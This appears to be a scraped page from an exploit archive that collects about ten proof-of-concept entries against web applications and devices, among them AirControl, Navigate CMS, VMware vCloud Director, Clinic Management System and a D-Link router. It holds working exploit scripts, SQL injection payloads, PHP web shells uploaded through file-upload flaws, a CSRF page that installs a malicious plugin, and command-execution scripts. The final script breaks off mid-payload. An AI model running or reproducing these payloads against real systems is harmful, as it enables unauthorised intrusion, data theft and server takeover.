ISHACK AI BOT

# Exploit Title: AirControl 1.4.2 - PreAuth Remote Code Execution # Date: 2020-06-03 # Exploit Author: 0xd0ff9 vs j3ssie # Vendor Homepage: https://www.ui.com/ # Software Link: https://www.ui.com/download/#!utilities # Version: AirControl <= 1.4.2 # Signature: https://github.com/jaeles-project/jaeles-signatures/blob/master/cves/aircontrol-rce.yaml import requests import re import urllib import sys print """USAGE: python exploit_aircontrol.py [url] [cmd]""" url = sys.argv[1] cmd = sys.argv[2] burp0_url = url +"/.seam?actionOutcome=/pwn.xhtml?pwned%3d%23{expressions.getClass().forName('java.io.BufferedReader').getDeclaredMethod('readLine').invoke(''.getClass().forName('java.io.BufferedReader').getConstructor(''.getClass().forName('java.io.Reader')).newInstance(''.getClass().forName('java.io.InputStreamReader').getConstructor(''.getClass().forName('java.io.InputStream')).newInstance(''.getClass().forName('java.lang.Process').getDeclaredMethod('getInputStream').invoke(''.getClass().forName('java.lang.Runtime').getDeclaredMethod('exec',''.getClass()).invoke(''.getClass().forName('java.lang.Runtime').getDeclaredMethod('getRuntime').invoke(null),'"+cmd+"')))))}" burp0_headers = {"User-Agent": "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Doflamingo) Chrome/80.0.3984.0 Safari/537.36", "Connection": "close"} r = requests.get(burp0_url, headers=burp0_headers, verify=False, allow_redirects=False) Locat = r.headers["Location"] res = re.search("pwned=(.*)(&cid=.*)",Locat).group(1) print "[Result CMD] ",cmd,": ",urllib.unquote_plus(res)

# Exploit Title: Hostel Management System 2.0 - 'id' SQL Injection (Unauthenticated) # Date: 2020-06-02 # Exploit Author: Selim Enes 'Enesdex' Karaduman # Vendor Homepage: https://phpgurukul.com/hostel-management-system/ # Software Link: https://phpgurukul.com/?smd_process_download=1&download_id=7210 # Version: 2.0 # Tested on: Windows 10 - Wamp Server --Vulnerable file /full-profile.php --Vulnerable code; $ret= mysqli_query($con,"SELECT * FROM registration where emailid = '".$_GET['id']."'"); Id parameter's value is going into sql query directly! --Proof Of Concept sqlmap -u "http://TARGET/hostel/full-profile.php?id=6" OR http://TARGET/hostel/full-profile.php?id=6' Single Quote will cause SQL error

# Exploit Title: Clinic Management System 1.0 - Unauthenticated Remote Code Execution # Google Dork: N/A # Date: 2020-06-02 # Exploit Author: BKpatron # Vendor Homepage: https://www.sourcecodester.com/php/14243/open-source-clinic-management-system-php-full-source-code.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/Nikhil_B/clinic-full-source-code-with-database_0.zip # Version: v1.0 # Tested on: Win 10 # CVE: N/A # Vulnerability: Clinic Management System version 1.0 suffers from an Unauthenticated File Upload Vulnerability allowing Remote Attackers to gain Remote Code Execution (RCE) on the Hosting Webserver via uploading a maliciously crafted PHP file. # vulnerable file : manage_website.php # Details: login to website as patient then access the 'localhost/source%20code/manage_website.php' page, as it does not check for an admin user. change website logo and upload your malicious php file(<?php echo shell_exec($_GET["cmd"]); ?>). if you see this message "Something Went Wrong" You have successfully uploaded the malicious php file. path of your file: http://localhost/source%20code/uploadImage/Logo/your_file.php # Proof of Concept: http://localhost/source%20code/manage_website.php POST /source%20code/manage_website.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------135192786613366 Content-Length: 2539 Referer: http://localhost/source%20code/manage_website.php Cookie: PHPSESSID=qdh5f7kelhhe9uvafveafit5e1 Connection: keep-alive Upgrade-Insecure-Requests: 1 -----------------------------58631544014332: undefined Content-Disposition: form-data; name="title" -----------------------------58631544014332 Content-Disposition: form-data; name="short_title" -----------------------------58631544014332 Content-Disposition: form-data; name="footer" -----------------------------58631544014332 Content-Disposition: form-data; name="currency_code" -----------------------------58631544014332 Content-Disposition: form-data; name="currency_symbol" -----------------------------58631544014332 Content-Disposition: form-data; name="old_website_image" logo for hospital system.jpg -----------------------------58631544014332 Content-Disposition: form-data; name="website_image"; filename="shell.php" Content-Type: application/octet-stream <?php echo shell_exec($_GET["cmd"]); ?>

# Exploit Title: Oriol Espinal CMS 1.0 - 'id' SQL Injection # Google Dork: inurl:/eotools_share/ # Date: 2020-06-03 # Exploit Author: TSAR # Vendor Homepage: http://www.oriolespinal.es/eowd # Software Link: http://www.oriolespinal.es/eotools # Version: ALL VERSION UP TO LATEST # Tested on: MACOS 10.11.2 # CVE : NOt YET [1]########### SQl INJECTION ########### Oriol Espinal CMS is brone to a remote sql injection vulnerability, the next exploit is applicable http://victim.com/path/eotools_share/editar.php?id=-1%20/*!50000union*/%20/*!50000all*/%20/*!50000select*/%201,2,3,4,5,6,7,8,9,10-- [2]########### SQl INJECTION ########### Oriol Espinal CMS is brone to a file upload vulnerability, the next exploit [using Burp Suite] is applicable: POST /path/eotools_cms/app_gestor_archivos/upload2_iframe.php HTTP/1.1 Host: victim.com User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://victim.com/path/eotools_cms/app_gestor_archivos/upload1_iframe.php X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------165073870416097602871919119556 Content-Length: 740 Connection: close Cookie: PHPSESSID=e159f6c9e8a818251a4ff48d47ab3df3; acopendivids=cortina2; acgroupswithpersist=nada -----------------------------165073870416097602871919119556 Content-Disposition: form-data; name="userfile"; filename="shell.php" Content-Type: image/png PNG; ********************************/ ********************************/ GIF89a; ********************/ ********************/<?php $_GET[d]($_GET[dd]); ?> -----------------------------165073870416097602871919119556 Content-Disposition: form-data; name="categoria" pdfs -----------------------------165073870416097602871919119556 Content-Disposition: form-data; name="descripcion" 123 -----------------------------165073870416097602871919119556 Content-Disposition: form-data; name="submit" upload -----------------------------165073870416097602871919119556-- the shell path is: http://victim.com/path/eotools_files/files/shell.php ========================================================== ========================================================== Greetz To : @zigo0o - Alnjm33 - ShoOt3r - red virus - pRedAtOr - Elkatrez Elmodamer - Egy-sn!p3r [ALL MUSLIM AND ARAB HACKERS] ==========================================================

# Exploit Title: Navigate CMS 2.8.7 - ''sidx' SQL Injection (Authenticated) # Date: 2020-06-04 # Exploit Author: Gus Ralph # Vendor Homepage: https://www.navigatecms.com/en/home # Software Link: https://sourceforge.net/projects/navigatecms/files/releases/navigate-2.8.7r1401.zip/download # Version: 2.8.7 # Tested on: Ubuntu # CVE: N/A # This script will leak the "activation_key" value for the user who's ID is set to 1 in the database. # The activation key can be used to reset that user's password to whatever you want, bypassing the need to crack a hash. # An example password reset URL would be: `/login.php?action=password-reset&value=[ACTIVATION CODE LEAKED FROM DB]` import requests, time, string user = raw_input("Please enter your username: \n") password = raw_input("Please enter your password: \n") URL = raw_input("Enter the target URL (in this format 'http://domain.com/navigate/'): \n") s = requests.Session() data = {'login-username': (None, user), 'login-password':(None, password)} s.post(url = URL + "login.php", files = data) dictionary = string.ascii_lowercase + string.ascii_uppercase + string.digits final = "" while True: for x in dictionary: payload = '(SELECT (CASE WHEN EXISTS(SELECT password FROM nv_users WHERE activation_key REGEXP BINARY "^' + str(final) + x + '.*" AND id = 1) THEN (SELECT sleep(5)) ELSE date_created END)); -- -' r = s.post(url = URL + "/navigate.php?fid=comments&act=1&rows=1&sidx=" + payload) if int(r.elapsed.total_seconds()) > 4: final += x print "Leaking contents of admin hash: " + final break else: pass

# Exploit Title: Clinic Management System 1.0 - Authenticated Arbitrary File Upload # Google Dork: N/A # Date: 2020-06-02 # Exploit Author: BKpatron # Vendor Homepage: https://www.sourcecodester.com/php/14243/open-source-clinic-management-system-php-full-source-code.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/Nikhil_B/clinic-full-source-code-with-database_0.zip # Version: v1.0 # Tested on: Win 10 # CVE: N/A # Vulnerability: Clinic Management System version 1.0 suffers from an Unauthenticated File Upload Vulnerability allowing Remote Attackers to gain Remote Code Execution (RCE) on the Hosting Webserver via uploading a maliciously crafted PHP file. # vulnerable file : manage_website.php # Details: login to website as patient then access the 'localhost/source%20code/manage_website.php' page, as it does not check for an admin user. change website logo and upload your malicious php file(<?php echo shell_exec($_GET["cmd"]); ?>). if you see this message "Something Went Wrong" You have successfully uploaded the malicious php file. path of your file: http://localhost/source%20code/uploadImage/Logo/your_file.php # Proof of Concept: http://localhost/source%20code/manage_website.php POST /source%20code/manage_website.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------135192786613366 Content-Length: 2539 Referer: http://localhost/source%20code/manage_website.php Cookie: PHPSESSID=qdh5f7kelhhe9uvafveafit5e1 Connection: keep-alive Upgrade-Insecure-Requests: 1 -----------------------------58631544014332: undefined Content-Disposition: form-data; name="title" -----------------------------58631544014332 Content-Disposition: form-data; name="short_title" -----------------------------58631544014332 Content-Disposition: form-data; name="footer" -----------------------------58631544014332 Content-Disposition: form-data; name="currency_code" -----------------------------58631544014332 Content-Disposition: form-data; name="currency_symbol" -----------------------------58631544014332 Content-Disposition: form-data; name="old_website_image" logo for hospital system.jpg -----------------------------58631544014332 Content-Disposition: form-data; name="website_image"; filename="shell.php" Content-Type: application/octet-stream <?php echo shell_exec($_GET["cmd"]); ?>

# Exploit Title: Navigate CMS 2.8.7 - Cross-Site Request Forgery (Add Admin) # Date: 2020-06-04 # Exploit Author: Gus Ralph # Vendor Homepage: https://www.navigatecms.com/en/home # Software Link: https://sourceforge.net/projects/navigatecms/files/releases/navigate-2.8.7r1401.zip/download # Version: 2.8.7 # Tested on: Ubuntu # CVE: <!-- After having an authenticated admin access this HTML page, simply go to as an unauthenticated user (path may slightly vary depending on installation location): http://DOMAIN.com/navigate/plugins/chiv/chiv.php --> <script> var logUrl = "http://localhost/navigate/navigate.php?fid=extensions&act=extension_upload"; function byteValue(x) { return x.charCodeAt(0) & 0xff; } function toBytes(datastr) { var ords = Array.prototype.map.call(datastr, byteValue); var ui8a = new Uint8Array(ords); return ui8a.buffer; } if (typeof XMLHttpRequest.prototype.sendAsBinary == 'undefined' && Uint8Array) { XMLHttpRequest.prototype.sendAsBinary = function(datastr) { this.send(toBytes(datastr)); } } function fileUpload(fileData, fileName) { var fileSize = fileData.length, boundary = "---------------------------399386530342483226231822376790", uri = logUrl, xhr = new XMLHttpRequest(); var additionalFields = { } var fileFieldName = "extension-upload"; xhr.open("POST", uri, true); xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8") xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary="+boundary); // simulate a file MIME POST request. xhr.setRequestHeader("Content-Length", fileSize); xhr.withCredentials = "true"; xhr.onreadystatechange = function() { if (xhr.readyState == 4) { if ((xhr.status >= 200 && xhr.status <= 200) || xhr.status == 304) { if (xhr.responseText != "") { alert(JSON.parse(xhr.responseText).msg); // display response. } } else if (xhr.status == 0) { $("#goto").show(); } } } var body = ""; for (var i in additionalFields) { if (additionalFields.hasOwnProperty(i)) { body += addField(i, additionalFields[i], boundary); } } body += addFileField(fileFieldName, fileData, fileName, boundary); body += "--" + boundary + "--"; xhr.sendAsBinary(body); return true; } function addField(name, value, boundary) { var c = "--" + boundary + "\r\n" c += "Content-Disposition: form-data; name='" + name + "'\r\n\r\n"; c += value + "\r\n"; return c; } function addFileField(name, value, filename, boundary) { var c = "--" + boundary + "\r\n" c += "Content-Disposition: form-data; name='" + name + "'; filename='" + filename + "'\r\n"; c += "Content-Type: application/zip\r\n\r\n"; c += value + "\r\n"; return c; } var start = function() { var c = "\x50\x4b\x03\x04\x0a\x00\x00\x00\x00\x00\x77\x9e\x97\x50\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x1c\x00\x63\x68\x69\x76\x2f\x55\x54\x09\x00\x03\xc2\xe3\xa1\x5e\xdb\xe3\xa1\x5e\x75\x78\x0b\x00\x01\x04\xe8\x03\x00\x00\x04\xe8\x03\x00\x00\x50\x4b\x03\x04\x14\x00\x00\x00\x08\x00\xa4\x9d\x97\x50\x02\x75\x9f\x67\x85\x00\x00\x00\xc0\x00\x00\x00\x10\x00\x1c\x00\x63\x68\x69\x76\x2f\x63\x68\x69\x76\x2e\x70\x6c\x75\x67\x69\x6e\x55\x54\x09\x00\x03\x33\xe2\xa1\x5e\x42\xe2\xa1\x5e\x75\x78\x0b\x00\x01\x04\xe8\x03\x00\x00\x04\xe8\x03\x00\x00\x55\x8d\x41\x0a\xc2\x30\x10\x45\xf7\x39\xc5\x90\xb5\x34\x48\x17\x42\x57\x4a\xc9\x05\xea\x09\x62\x32\x90\xa0\xe9\x84\x64\x5a\x15\xf1\xee\xda\xd8\x2e\xfc\xcb\xff\x1e\xff\xbf\x04\x7c\x23\x39\xf0\x0d\x65\x07\xf2\x34\xc0\x59\x6b\xd0\x72\xf7\x03\x33\xe6\x12\x68\x5c\xd0\xbe\x69\xdb\xc3\xd6\x9b\x89\x3d\xe5\xa5\xee\x7d\x98\x0d\xd3\x06\xee\x78\x29\x81\xeb\x96\x67\x4e\xa5\x53\xca\x1b\x7b\x8d\xae\x09\xa4\x8e\xf6\x5f\x76\x58\x6c\x0e\x89\xd7\x87\x01\x23\x31\x42\x4f\x31\x9a\xd1\x81\x7e\xa0\x9d\x2a\x5b\x75\x7e\xa6\x3a\xbc\x7d\x88\xb7\xf8\x00\x50\x4b\x03\x04\x0a\x00\x00\x00\x00\x00\x1c\x9e\x97\x50\x37\x55\x33\xfd\x3b\x00\x00\x00\x3b\x00\x00\x00\x15\x00\x1c\x00\x63\x68\x69\x76\x2f\x63\x68\x69\x76\x2e\x69\x6e\x66\x6f\x2e\x70\x6c\x75\x67\x69\x6e\x55\x54\x09\x00\x03\x18\xe3\xa1\x5e\x06\xe3\xa1\x5e\x75\x78\x0b\x00\x01\x04\xe8\x03\x00\x00\x04\xe8\x03\x00\x00\x3c\x68\x31\x3e\x57\x65\x6c\x63\x6f\x6d\x65\x20\x74\x6f\x20\x43\x68\x69\x76\x61\x74\x6f\x27\x73\x20\x52\x43\x45\x20\x70\x6c\x75\x67\x69\x6e\x20\x66\x6f\x72\x20\x4e\x61\x76\x69\x67\x61\x74\x65\x20\x43\x4d\x53\x2e\x3c\x2f\x68\x31\x3e\x0a\x50\x4b\x03\x04\x0a\x00\x00\x00\x00\x00\x71\x9e\x97\x50\xfa\x43\x48\xab\x1f\x00\x00\x00\x1f\x00\x00\x00\x0d\x00\x1c\x00\x63\x68\x69\x76\x2f\x63\x68\x69\x76\x2e\x70\x68\x70\x55\x54\x09\x00\x03\xb5\xe3\xa1\x5e\xa4\xe3\xa1\x5e\x75\x78\x0b\x00\x01\x04\xe8\x03\x00\x00\x04\xe8\x03\x00\x00\x3c\x3f\x70\x68\x70\x20\x73\x79\x73\x74\x65\x6d\x28\x24\x5f\x47\x45\x54\x5b\x27\x63\x6d\x64\x27\x5d\x29\x3b\x20\x3f\x3e\x0a\x50\x4b\x01\x02\x1e\x03\x0a\x00\x00\x00\x00\x00\x77\x9e\x97\x50\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x18\x00\x00\x00\x00\x00\x00\x00\x10\x00\xff\x41\x00\x00\x00\x00\x63\x68\x69\x76\x2f\x55\x54\x05\x00\x03\xc2\xe3\xa1\x5e\x75\x78\x0b\x00\x01\x04\xe8\x03\x00\x00\x04\xe8\x03\x00\x00\x50\x4b\x01\x02\x1e\x03\x14\x00\x00\x00\x08\x00\xa4\x9d\x97\x50\x02\x75\x9f\x67\x85\x00\x00\x00\xc0\x00\x00\x00\x10\x00\x18\x00\x00\x00\x00\x00\x01\x00\x00\x00\xff\x81\x3f\x00\x00\x00\x63\x68\x69\x76\x2f\x63\x68\x69\x76\x2e\x70\x6c\x75\x67\x69\x6e\x55\x54\x05\x00\x03\x33\xe2\xa1\x5e\x75\x78\x0b\x00\x01\x04\xe8\x03\x00\x00\x04\xe8\x03\x00\x00\x50\x4b\x01\x02\x1e\x03\x0a\x00\x00\x00\x00\x00\x1c\x9e\x97\x50\x37\x55\x33\xfd\x3b\x00\x00\x00\x3b\x00\x00\x00\x15\x00\x18\x00\x00\x00\x00\x00\x01\x00\x00\x00\xa4\x81\x0e\x01\x00\x00\x63\x68\x69\x76\x2f\x63\x68\x69\x76\x2e\x69\x6e\x66\x6f\x2e\x70\x6c\x75\x67\x69\x6e\x55\x54\x05\x00\x03\x18\xe3\xa1\x5e\x75\x78\x0b\x00\x01\x04\xe8\x03\x00\x00\x04\xe8\x03\x00\x00\x50\x4b\x01\x02\x1e\x03\x0a\x00\x00\x00\x00\x00\x71\x9e\x97\x50\xfa\x43\x48\xab\x1f\x00\x00\x00\x1f\x00\x00\x00\x0d\x00\x18\x00\x00\x00\x00\x00\x01\x00\x00\x00\xa4\x81\x98\x01\x00\x00\x63\x68\x69\x76\x2f\x63\x68\x69\x76\x2e\x70\x68\x70\x55\x54\x05\x00\x03\xb5\xe3\xa1\x5e\x75\x78\x0b\x00\x01\x04\xe8\x03\x00\x00\x04\xe8\x03\x00\x00\x50\x4b\x05\x06\x00\x00\x00\x00\x04\x00\x04\x00\x4f\x01\x00\x00\xfe\x01\x00\x00\x00\x00" fileUpload(c, "chiv.zip"); }; start(); </script>

# Exploit Title: VMWAre vCloud Director 9.7.0.15498291 - Remote Code Execution # Exploit Author: Tomas Melicher # Technical Details: https://citadelo.com/en/blog/full-infrastructure-takeover-of-vmware-cloud-director-CVE-2020-3956/ # Date: 2020-05-24 # Vendor Homepage: https://www.vmware.com/ # Software Link: https://www.vmware.com/products/cloud-director.html # Tested On: vCloud Director 9.7.0.15498291 # Vulnerability Description: # VMware vCloud Director suffers from an Expression Injection Vulnerability allowing Remote Attackers to gain Remote Code Execution (RCE) via submitting malicious value as a SMTP host name. #!/usr/bin/python import argparse # pip install argparse import base64, os, re, requests, sys if sys.version_info >= (3, 0): from urllib.parse import urlparse else: from urlparse import urlparse from requests.packages.urllib3.exceptions import InsecureRequestWarning requests.packages.urllib3.disable_warnings(InsecureRequestWarning) PAYLOAD_TEMPLATE = "${''.getClass().forName('java.io.BufferedReader').getDeclaredConstructors()[1].newInstance(''.getClass().forName('java.io.InputStreamReader').getDeclaredConstructors()[3].newInstance(''.getClass().forName('java.lang.ProcessBuilder').getDeclaredConstructors()[0].newInstance(['bash','-c','echo COMMAND|base64 -di|bash|base64 -w 0']).start().getInputStream())).readLine()}" session = requests.Session() def login(url, username, password, verbose): target_url = '%s://%s%s'%(url.scheme, url.netloc, url.path) res = session.get(target_url) match = re.search(r'tenant:([^"]+)', res.content, re.IGNORECASE) if match: tenant = match.group(1) else: print('[!] can\'t find tenant identifier') return if verbose: print('[*] tenant: %s'%(tenant)) match = re.search(r'security_check\?[^"]+', res.content, re.IGNORECASE) if match: # Cloud Director 9.* login_url = '%s://%s/login/%s'%(url.scheme, url.netloc, match.group(0)) res = session.post(login_url, data={'username':username,'password':password}) if res.status_code == 401: print('[!] invalid credentials') return else: # Cloud Director 10.* match = re.search(r'/cloudapi/.*/sessions', res.content, re.IGNORECASE) if match: login_url = '%s://%s%s'%(url.scheme, url.netloc, match.group(0)) headers = { 'Authorization': 'Basic %s'%(base64.b64encode('%s@%s:%s'%(username,tenant,password))), 'Accept': 'application/json;version=29.0', 'Content-type': 'application/json;version=29.0' } res = session.post(login_url, headers=headers) if res.status_code == 401: print('[!] invalid credentials') return else: print('[!] url for login form was not found') return cookies = session.cookies.get_dict() jwt = cookies['vcloud_jwt'] session_id = cookies['vcloud_session_id'] if verbose: print('[*] jwt token: %s'%(jwt)) print('[*] session_id: %s'%(session_id)) res = session.get(target_url) match = re.search(r'organization : \'([^\']+)', res.content, re.IGNORECASE) if match is None: print('[!] organization not found') return organization = match.group(1) if verbose: print('[*] organization name: %s'%(organization)) match = re.search(r'orgId : \'([^\']+)', res.content) if match is None: print('[!] orgId not found') return org_id = match.group(1) if verbose: print('[*] organization identifier: %s'%(org_id)) return (jwt,session_id,organization,org_id) def exploit(url, username, password, command, verbose): (jwt,session_id,organization,org_id) = login(url, username, password, verbose) headers = { 'Accept': 'application/*+xml;version=29.0', 'Authorization': 'Bearer %s'%jwt, 'x-vcloud-authorization': session_id } admin_url = '%s://%s/api/admin/'%(url.scheme, url.netloc) res = session.get(admin_url, headers=headers) match = re.search(r'<description>\s*([^<\s]+)', res.content, re.IGNORECASE) if match: version = match.group(1) if verbose: print('[*] detected version of Cloud Director: %s'%(version)) else: version = None print('[!] can\'t find version of Cloud Director, assuming it is more than 10.0') email_settings_url = '%s://%s/api/admin/org/%s/settings/email'%(url.scheme, url.netloc, org_id) payload = PAYLOAD_TEMPLATE.replace('COMMAND', base64.b64encode('(%s) 2>&1'%command)) data = '<root:OrgEmailSettings xmlns:root="http://www.vmware.com/vcloud/v1.5"><root:IsDefaultSmtpServer>false</root:IsDefaultSmtpServer>' data += '<root:IsDefaultOrgEmail>true</root:IsDefaultOrgEmail><root:FromEmailAddress/><root:DefaultSubjectPrefix/>' data += '<root:IsAlertEmailToAllAdmins>true</root:IsAlertEmailToAllAdmins><root:AlertEmailTo/><root:SmtpServerSettings>' data += '<root:IsUseAuthentication>false</root:IsUseAuthentication><root:Host>%s</root:Host><root:Port>25</root:Port>'%(payload) data += '<root:Username/><root:Password/></root:SmtpServerSettings></root:OrgEmailSettings>' res = session.put(email_settings_url, data=data, headers=headers) match = re.search(r'value:\s*\[([^\]]+)\]', res.content) if verbose: print('') try: print(base64.b64decode(match.group(1))) except Exception: print(res.content) parser = argparse.ArgumentParser(usage='%(prog)s -t target -u username -p password [-c command] [--check]') parser.add_argument('-v', action='store_true') parser.add_argument('-t', metavar='target', help='url to html5 client (http://example.com/tenant/my_company)', required=True) parser.add_argument('-u', metavar='username', required=True) parser.add_argument('-p', metavar='password', required=True) parser.add_argument('-c', metavar='command', help='command to execute', default='id') args = parser.parse_args() url = urlparse(args.t) exploit(url, args.u, args.p, args.c, args.v)

# Exploit Title: D-Link DIR-615 T1 20.10 - CAPTCHA Bypass # Date: 2019-10-12 # Exploit Author: huzaifa hussain # Vendor Homepage: https://in.dlink.com/ # Version: DIR-615 T1 ver:20.10 # Tested on: D-LINK ROUTER "MODEL NO: DIR-615" with "FIRMWARE VERSION:20.10" & "HARDWARE VERSION:T1 # CVE: CVE-2019-17525 D-LINK ROUTER "MODEL NO: DIR-615" with "FIRMWARE VERSION:20.10" & "HARDWARE VERSION:T1 A vulnerability found on login-in page of D-LINK ROUTER "DIR-615" with "FIRMWARE VERSION:20.10" & "HARDWARE VERSION:T1" which allows attackers to easily bypass CAPTCHA on login page by BRUTEFORCING. ------------------------------------ D-Link released new firmware designed to protect against logging in to the router using BRUTEFORCING. There is a flaw in the captcha authentication system that allows an attacker to reuse the same captcha without reloading new. ATTACK SCENARIO AND REPRODUCTION STEPS 1: Find the ROUTER LoginPage. 2: Fill the required login credentials. 3: Fill the CAPTCH properly and Intercept the request in Burpsuit. 4: Send the Request to Intruder and select the target variables i.e. username & password which will we bruteforce under Positions Tab 5: Set the payloads on target variables i.e. username & password under Payloads Tab. 5: Set errors in (the validatecode is invalid & username or password error, try again) GREP-MATCH under Options Tab. 6: Now hit the start attack and you will find the correct credentials. ------------------------------------- Huzaifa Hussain

# Exploit Title: Navigate CMS 2.8.7 - Authenticated Directory Traversal # Date: 2020-06-04 # Exploit Author: Gus Ralph # Vendor Homepage: https://www.navigatecms.com/en/home # Software Link: https://sourceforge.net/projects/navigatecms/files/releases/navigate-2.8.7r1401.zip/download # Version: 2.8.7 # Tested on: Ubuntu # CVE: CVE-2020-13795 A malicious user can abuse the authenticated templates functionality to traverse out of the templates directory to read and write to any file on the webserver as www-data. For this vulnerability, I looked into the "templates" feature of the application. It seems we can edit any file in the application's templates directory, for example: `/var/www/html/navigate/private/1/templates/` My initial thought was to traverse out of the current directory and read the global config file (located at `/var/www/html/navigate/cfg/globals.php`). My payload would then consist of creating a template, setting the path to be `/var/www/html/navigate/private/1/templates/../../../cfg/globals.php` Furthermore, this can be abused to write to a PHP file and gain RCE on the remote server, for example: Traversal payload: `../../../navigate.php` PHP Code execution payload: ``` <?php system($_GET['cmd']); ?> ```

# Exploit Title: Online Marriage Registration System 1.0 Remote Code Execution # Google Dork: N/A # Date: 2020-05-31 # Exploit Author: Selim Enes 'Enesdex' Karaduman # Vendor Homepage: https://phpgurukul.com/ # Software Link: https://phpgurukul.com/online-marriage-registration-system-using-php-and-mysql/ # Version: 1.0 # Tested on: Windows 10 / Xampp Server and Wamp Server # CVE : N/A # Notes : Exploit Requires Authentication But You Can Register As User For Free, This Is Enough To Exploit System #!/bin/bash echo "# Online Marriage Registration System 1.0 ---> Remote Code Execution" echo "# Author ---> Selim Enes Karaduman" echo "# Usage ---> ./exploit.sh -u TARGET_URL(e.g http://10.10.10.10/omrs/ -m MOBILE_NUMBER -p PASSWORD -c COMMAND" while getopts u:m:p:c: par do case $par in u) url=$OPTARG ;; m) mnum=$OPTARG ;; p) passwd=$OPTARG ;; c) command=$OPTARG ;; esac done sess=$(curl -s -i -X POST $url/user/login.php -d "mobno=$mnum&password=$passwd&login=" | grep -F "Set-Cookie" | sed 's/;//g' | cut -d " " -f 2) url_for_req=$(echo $url | cut -d "/" -f 3) function upload(){ curl -i -s -k -X $'POST' \ -H $"Host: $url_for_req" -H $'Content-Type: multipart/form-data; boundary=---------------------------8759967759481129101498329242' -H $"Cookie: $sess" -H $'Content-Length: 3244' \ -b $"$sess" \ --data-binary $'-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"dom\"\x0d\x0a\x0d\x0a05/01/2020\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"nofhusband\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"husimage\"; filename=\"a.php\"\x0d\x0aContent-Type: application/x-php\x0d\x0a\x0d\x0a<?php\x0aecho system($_GET[\'cmd\']);\x0a?>\x0a\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"hreligion\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"hdob\"\x0d\x0a\x0d\x0a05/01/2020\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"hsbmarriage\"\x0d\x0a\x0d\x0aBachelor\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"haddress\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"hzipcode\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"hstate\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"hadharno\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"nofwife\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"wifeimage\"; filename=\"test.jpg\"\x0d\x0aContent-Type: image/jpeg\x0d\x0a\x0d\x0ahi\x0a\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"wreligion\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"wdob\"\x0d\x0a\x0d\x0a05/01/2020\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"wsbmarriage\"\x0d\x0a\x0d\x0aBachelor\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"waddress\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"wzipcode\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"wstate\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"wadharno\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"witnessnamef\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"waddressfirst\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"witnessnames\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"waddresssec\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"witnessnamet\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"waddressthird\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; 